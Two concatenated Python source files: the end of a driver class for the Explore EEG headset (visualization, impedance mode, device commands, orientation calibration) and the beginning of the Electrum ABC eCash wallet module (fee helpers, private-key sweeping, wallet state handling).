notch_freq (int): Line frequency for the notch filter (50 or 60 Hz). No notch filter is applied if it is None.
calibre_file (str): Orientation calibration coefficients file (see calibrate_orn), optional.
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
self.parser.notch_freq = notch_freq
if bp_freq is not None:
self.parser.apply_bp_filter = True
self.parser.bp_freq = bp_freq
self.m_dashboard = Dashboard(n_chan=self.parser.n_chan,
exg_fs=self.parser.fs,
firmware_version=self.parser.firmware_version)
self.m_dashboard.start_server()
thread = Thread(target=self._io_loop)
thread.daemon = True
thread.start()
self.m_dashboard.start_loop()
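# Usage sketch (hedged; the filter values are illustrative and match the
# defaults in the signature): a 1-30 Hz bandpass plus a 50 Hz notch is a
# typical preview configuration.
#
#   explore.visualize(bp_freq=(1, 30), notch_freq=50)  # starts the dashboard server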
def _io_loop(self, device_id=0, mode="visualize"):
self.is_acquiring = [True]
# Wait until dashboard is initialized.
while not hasattr(self.m_dashboard, 'doc'):
print('wait...')
time.sleep(.5)
while self.is_acquiring[0]:
try:
packet = self.parser.parse_packet(mode=mode, dashboard=self.m_dashboard)
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
self.is_acquiring[0] = False
if mode == "visualize":
os._exit(0)
sys.exit(0)
def signal_handler(self, signal, frame):
# Safe handler of keyboardInterrupt
self.is_acquiring = [False]
print("Program is exiting...")
sys.exit(0)
def measure_imp(self, device_id=0, notch_freq=50):
"""
Visualization of the electrode impedances
Args:
device_id (int): Device ID
notch_freq (int): Notch frequency for filtering the line noise (50 or 60 Hz)
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
assert self.parser.fs == 250, "Impedance mode only works in 250 Hz sampling rate!"
self.is_acquiring = [True]
signal.signal(signal.SIGINT, self.signal_handler)
try:
thread = Thread(target=self._io_loop, args=(device_id, "impedance",))
thread.daemon = True
self.parser.apply_bp_filter = True
self.parser.bp_freq = (61, 64)
self.parser.notch_freq = notch_freq
thread.start()
# Activate impedance measurement mode in the device
from explorepy import command
imp_activate_cmd = command.ZmeasurementEnable()
if self.change_settings(imp_activate_cmd):
self.m_dashboard = Dashboard(n_chan=self.parser.n_chan, mode="impedance", exg_fs=self.parser.fs,
firmware_version=self.parser.firmware_version)
self.m_dashboard.start_server()
self.m_dashboard.start_loop()
else:
os._exit(0)
finally:
print("Disabling impedance mode...")
from explorepy import command
imp_deactivate_cmd = command.ZmeasurementDisable()
self.change_settings(imp_deactivate_cmd)
sys.exit(0)
def set_marker(self, code):
"""Sets an event marker during the recording
Args:
code (int): Marker code. It must be an integer larger than 7 (codes from 0 to 7 are reserved for hardware markers).
"""
assert self.is_connected, "Explore device is not connected. Please connect the device first."
self.parser.set_marker(marker_code=code)
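# Marker sketch (hedged): markers are normally set from another thread or a
# callback while record_data() or push2lsl() is running; codes 0-7 are reserved
# for hardware markers, so only values larger than 7 are accepted.
#
#   explore.set_marker(code=8)  # tag an experimental event in the ongoing stream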
def change_settings(self, command, device_id=0):
"""
Sends a command message to the device and waits for acknowledgement
Args:
device_id (int): Device ID
command (explorepy.command.Command): Command object
Returns:
bool: True if the device acknowledged and processed the command, False otherwise
"""
from explorepy.command import send_command
assert self.is_connected, "Explore device is not connected. Please connect the device first."
sending_attempt = 5
while sending_attempt:
try:
sending_attempt = sending_attempt-1
time.sleep(0.1)
send_command(command, self.socket)
sending_attempt = 0
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
return 0
is_listening = [True]
command_processed = False
def stop_listening(flag):
flag[0] = False
waiting_time = 10
command_timer = Timer(waiting_time, stop_listening, [is_listening])
command_timer.start()
print("waiting for ack and status messages...")
while is_listening[0]:
try:
packet = self.parser.parse_packet(mode="listen")
if isinstance(packet, CommandRCV):
if command.int2bytearray(packet.opcode, 1) == command.opcode.value:
print("The opcode matches the sent command; Explore has received the command")
if isinstance(packet, CalibrationInfo):
self.parser.imp_calib_info['slope'] = packet.slope
self.parser.imp_calib_info['offset'] = packet.offset
if isinstance(packet, CommandStatus):
if command.int2bytearray(packet.opcode, 1) == command.opcode.value:
command_processed = True
is_listening = [False]
command_timer.cancel()
print("The opcode matches the sent command, Explore has processed the command")
return True
except ConnectionAbortedError:
print("Device has been disconnected! Scanning for last connected device...")
try:
self.parser.socket = self.device[device_id].bt_connect()
except DeviceNotFoundError as e:
print(e)
return 0
if not command_processed:
print("No status message has been received after ", waiting_time, " seconds. Please restart the device and "
"send the command again.")
return False
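# Command sketch (hedged): the command classes below are the ones already used
# by measure_imp(); they are shown here purely to illustrate the call pattern.
#
#   from explorepy import command
#   ok = explore.change_settings(command.ZmeasurementDisable())
#   if not ok:
#       print("Device did not acknowledge the command")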
def calibrate_orn(self, file_name, device_id=0, do_overwrite=False):
r"""Calibrate the orientation module of the specified device
Args:
device_id (int): device id
file_name (str): Output file name used for the calibration recording. The ORN module must be active on the device.
do_overwrite (bool): Overwrite if files exist already
"""
print("Start recording for 100 seconds, please move the device around during this time, in all directions")
self.record_data(file_name, do_overwrite=do_overwrite, device_id=device_id, duration=100, file_type='csv')
calibre_out_file = file_name + "_calibre_coef.csv"
assert not (os.path.isfile(calibre_out_file) and not do_overwrite), calibre_out_file + " already exists!"
import numpy as np
with open((file_name + "_ORN.csv"), "r") as f_set, open(calibre_out_file, "w") as f_coef:
f_coef.write("kx, ky, kz, mx_offset, my_offset, mz_offset\n")
csv_reader = csv.reader(f_set, delimiter=",")
csv_coef = csv.writer(f_coef, delimiter=",")
np_set = list(csv_reader)
np_set = np.array(np_set[1:], dtype=float)
mag_set_x = np.sort(np_set[:, -3])
mag_set_y = np.sort(np_set[:, -2])
mag_set_z = np.sort(np_set[:, -1])
mx_offset = 0.5 * (mag_set_x[0] + mag_set_x[-1])
my_offset = 0.5 * (mag_set_y[0] + mag_set_y[-1])
mz_offset = 0.5 * (mag_set_z[0] + mag_set_z[-1])
kx = 0.5 * (mag_set_x[-1] - mag_set_x[0])
ky = 0.5 * (mag_set_y[-1] - mag_set_y[0])
kz = 0.5 * (mag_set_z[-1] - mag_set_z[0])
k = np.sort(np.array([kx, ky, kz]))
kx = 1 / kx
ky = 1 / ky
kz = 1 / kz
calibre_set = np.array([kx, ky, kz, mx_offset, my_offset, mz_offset])
csv_coef.writerow(calibre_set)
f_set.close()
f_coef.close()
os.remove((file_name + "_ORN.csv"))
os.remove((file_name + "_ExG.csv"))
os.remove((file_name + "_Marker.csv"))
if __name__ == '__main__':
pass
|
wallet.py
|
# Electrum ABC - lightweight eCash client
# Copyright (C) 2020 The Electrum ABC developers
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, ExcessiveFee, PrintError,
UserCancelled, InvalidPassword, profiler,
format_satoshis, format_time, finalization_print_error,
to_string, bh2u, TimeoutException)
from .address import Address, Script, ScriptOutput, PublicKey
from .version import PACKAGE_VERSION
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import mnemo
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if bitcoin.is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(bitcoin.TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(bitcoin.TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
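# Sweep usage sketch (hedged: `network` and `config` are the usual Electrum ABC
# Network and SimpleConfig objects, and the WIF keys/address are placeholders):
#
#   recipient = Address.from_string("ecash:qq...")           # destination (placeholder)
#   tx = sweep(["K...WIF-1...", "L...WIF-2..."], network, config, recipient)
#   network.broadcast_transaction(tx)                         # assumed broadcast entry point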
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history changes). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
self.change_reserved = set(Address.from_string(a) for a in storage.get('change_reserved', ()))
self.change_reserved_default = [Address.from_string(a) for a in storage.get('change_reserved_default', ())]
self.change_unreserved = [Address.from_string(a) for a in storage.get('change_unreserved', ())]
self.change_reserved_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Address objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def save_change_reservations(self):
with self.lock:
self.storage.put('change_reserved_default', [a.to_storage_string() for a in self.change_reserved_default])
self.storage.put('change_reserved', [a.to_storage_string() for a in self.change_reserved])
unreserved = self.change_unreserved + list(self.change_reserved_tmp)
self.storage.put('change_unreserved', [a.to_storage_string() for a in unreserved])
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text = None):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up since is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove tx_hash from the unverified map and add it to the verified map
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_hash(), except our
version returns None instead of NULL_HASH_HEX for a 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
"""Effect of tx on address."""
assert isinstance(address, Address)
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# subtract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
